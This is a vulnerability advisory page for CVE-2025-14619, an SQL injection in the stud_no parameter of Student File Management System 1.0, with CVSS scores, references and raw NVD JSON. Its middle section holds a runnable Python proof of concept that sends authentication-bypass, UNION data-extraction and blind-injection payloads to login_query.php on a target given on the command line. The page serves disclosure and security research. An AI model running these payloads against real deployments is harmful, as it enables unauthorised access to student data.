CVE-2025-14619

Description

A vulnerability was found in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login_query.php. Performing manipulation of the argument stud_no results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:student_file_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Student File Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14619 SQL Injection PoC
# Target: Student File Management System 1.0 - login_query.php
# Parameter: stud_no

import requests
import sys

def exploit_sql_injection(target_url, payload):
    """
    SQL Injection PoC for CVE-2025-14619
    Tests for boolean-based blind SQL injection
    """
    # Target endpoint
    endpoint = f"{target_url}/login_query.php"
    
    # Malicious payload - extracts database version
    data = {
        'stud_no': payload,
        'submit': 'Login'
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

# Test payloads
payloads = [
    # Basic authentication bypass
    "admin' OR '1'='1",
    # UNION-based injection to get database version
    "admin' UNION SELECT 1,2,@@version,4,5--",
    # Extract current database name
    "admin' UNION SELECT 1,2,database(),4,5--",
    # Extract user information
    "admin' UNION SELECT 1,2,user(),4,5--",
    # Boolean-based blind injection to verify vulnerability
    "admin' AND 1=1--",
    # Time-based blind injection
    "admin' AND SLEEP(5)--"
]

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14619.py <target_url>")
        print("Example: python cve-2025-14619.py http://localhost/student-management")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2025-14619 on {target}")
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {payload}")
        result = exploit_sql_injection(target, payload)
        print(f"[+] Response length: {len(result)}")
        if 'admin' in result.lower() or 'login' in result.lower():
            print("[!] Possible successful injection detected")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14619
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14619
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14619/
[4] VulDB https://vuldb.com/cve/CVE-2025-14619
[5] https://code-projects.org/
[6] https://github.com/jjjjj-zr/jjjjjzr2/issues/2
[7] https://vuldb.com/?ctiid.336304
[8] https://vuldb.com/?id.336304
[9] https://vuldb.com/?submit.707101
[10] https://vuldb.com/?submit.709095

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14619", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.210", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login_query.php. Performing manipulation of the argument stud_no results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:student_file_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8AA96545-7C5D-4A6E-8928-7A86633627FC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jjjjj-zr/jjjjjzr2/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336304", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336304", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707101", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.709095", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}